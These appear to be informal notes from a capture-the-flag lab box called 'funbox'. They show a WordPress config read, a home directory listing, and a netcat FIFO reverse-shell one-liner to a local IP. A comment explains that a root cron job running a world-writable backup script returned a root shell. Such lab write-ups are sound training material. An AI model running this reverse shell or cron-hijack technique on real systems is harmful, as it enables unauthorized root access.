cat var/www/html/wp-config.php
www-data@funbox:/home/funny$ ls -la
ls -la
total 47592
drwxr-xr-x 3 funny funny 4096 Aug 21 2020 .
drwxr-xr-x 4 root root 4096 Jun 19 2020 ..
-rwxrwxrwx 1 funny funny 55 Aug 21 2020 .backup.sh
lrwxrwxrwx 1 funny funny 9 Aug 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 funny funny 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 funny funny 3771 Feb 25 2020 .bashrc
drwx------ 2 funny funny 4096 Jun 19 2020 .cache
-rw-r--r-- 1 funny funny 807 Feb 25 2020 .profile
-rw-rw-r-- 1 funny funny 162 Jun 19 2020 .reminder.sh
-rw-rw-r-- 1 funny funny 48701440 Aug 8 01:26 html.tar
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.214 1338 >/tmp/f
Followed to a tea minus the build-lxd command should be build-lxc
Literally lost my shell so reran nc on port 1338 because the backup was running as a cron job as supposedly funny. Came back as root lol.
Turns out root was running the same cron job for /home/funny/.backup.sh
Didnt realize this earlier but makes more sense now with pspy results
I just got lucky :D
